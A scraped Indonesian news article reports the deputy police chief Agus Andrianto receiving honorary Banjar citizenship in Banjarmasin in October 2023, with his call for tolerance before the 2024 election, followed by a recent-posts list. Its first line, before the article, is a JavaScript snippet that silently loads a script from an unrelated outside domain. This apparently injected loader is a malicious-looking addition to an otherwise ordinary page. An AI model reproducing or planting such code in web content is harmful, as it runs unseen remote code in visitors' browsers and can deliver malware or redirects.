(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Wakapolri Diberi Anugerah Kehormatan Warga Banjar


KANALKALIMANTAN.COM, BANJARMASIN – Wakapolri Komjen Pol Agus Andrianto diberi anugerah kehormatan warga Banjar oleh Pengurus Pusat Kerukunan Bubuhan Banjar (KBB).

Penyerahan anugerah kehormatan itu diserahkan langsung Ketua Umum KBB sekaligus Gubernur Kalsel H Sahbirin Noor di Gedung Mahligai Pancasila Banjarmasin, Senin (2/10/2023) malam.

Prosesi penganugerahan dilakukan dimulai dengan pembaca Surat Keputusan (SK) kemudian dilanjutkan dengan pengenaan baju adat Banjar dan laung kepada Wakapolri Komjen Agus Andrianto.

Tak ketinggalan, prosesi tepung tawar yang menjadi salah satu adat istiadat Banjar turut mengiringi penganugerahan kehormatan dari warga Banjar kepada Wakapolri.

Baca juga: Kemarau Hingga November, Karhutla Kian Mengancam Kalsel

Gubernur Kalsel Sahbirin Noor mengaku bangga sebab seorang perwira tinggi berada pada bagian warga Banjar dan mau menjadi bagian dari Kerukunan Bubuhan Banjar (KBB).

“Saya mengucapkan selamat datang dan selamat bergabung dengan KBB. InsyaAllah perhimpunan kita membawa manfaat,” ungkap Ketua Umum KBB Pusat, Sahbirin Noor.

Sahbirin menjelaskan, selama ini suku Banjar dikenal sebagai masyarakat religius yang banyak melahirkan ulama-ulama besar.

Baca juga: Kabut Asap Kian Pekat, Dinkes Pulang Pisau Imbau Warga Pakai Masker 

Selain itu, dalam kehidupan sosial orang Banjar dikatakannya mudah diterima dimanapun. Sehingga tidak heran jika orang Banjar tersebar di seluruh Indonesia bahkan di berbagai belahan negara.

“Orang Banjar bisa diterima dimanapun. Di Indonesia sebagian besar di Sumatera, Jawa Kalimantan. Di Mekah, Singapura, Brunai, dan lain-lain, bahkan ada di Amerika dan Inggris. Sehingga penyebaran orang Banjar pantas menjadi kebanggaan,” ujarnya

Sementara itu, Wakapolri Komjen Agus mengungkapkan rasa terimakasihnya kepada seluruh warga Kalsel, sebab telah diterima dengan baik selama melaksanakan kunjungan kerja. Terlebih ia merasa bangga telah diberikan anugerah kehormatan dari KBB.

“Kami merasa terhormat, patut berbangga diri kami diterima warga dari keluarga besar Kerukunan Bubuhan Banjar,” kata Komjen Agus.

Baca juga: Gus Yaqut Tak Akan Cabut Pernyataan Meski ‘Diancam’ PKB

Polisi bintang tiga ini berpesan kepada seluruh warga Kalsel agar menjaga kondusifitas menjelang Pemilu 2024. “Pemilu sudah di depan mata, menjaga semangat toleransi dalam menyongsong Pemilu agar pesta demokrasi dapat berjalan baik prosesnya,” ujarnya.

Menurutnya, perbedaan pendapat dan pilihan merupakan hal yang lumrah dan tidak bisa dihindarkan dalam setiap kontestasi. Sehingga, ia menegaskan agar semua pihak menjunjung tinggi rasa toleransi. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Jaya Dekati PAN, Upaya Mengulang Koalisi di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Amanat Nasional (PAN) Kota Banjarbaru kedatangan Darmawan Jaya Setiawan, kader… Read More

4 jam ago

Lima Rumah Terbakar di Pekapuran Laut, Motor Matic Ikut Hangus

KANALKALIMANTAN.COM, BANJARMASIN - Warga Jalan Pekapuran B Laut, Kecamatan Banjarmasin Tengah, Kota Banjarmasin dibuat geger… Read More

6 jam ago

Naik Kano di Danau Seran Banjarbaru, Rekomendasi View Spot Foto Estetik

KANALKALIMANTAN.COM, BANJARBARU - Pencinta wisata alam wajib menjajal objek wisata satu ini, yaitu wahana kano… Read More

9 jam ago

Pasangan Calon Belum Pasti, Aditya: Titik Akhirnya SK Partai

KANALKALIMANTAN.COM, BANJARBARU – Aditya Mufti Ariffin menyerahkan formulir pendaftaran sebagai bakal calon (bacalon) Wali Kota… Read More

11 jam ago

Masruri Lepas 25 JCH Kabupaten Banjar yang Tergabung dalam Kloter 10

KANALKALIMANTAN.COM, MARTAPURA - Mewakili Bupati Banjar H Saidi Mansyur, Asisten Pemerintahan dan Kesra H Masruri… Read More

12 jam ago

Tingkatkan Kinerja dan Pelayanan Publik, Pemkab Banjar Audiensi ke Kementerian PAN RB

KANALKALIMANTAN.COM, JAKARTA - Pemerintah Kabupaten Banjar melaksanakan audiensi dengan Asisten Deputi Koordinasi Pelaksanaan Kebijakan dan… Read More

12 jam ago

This website uses cookies.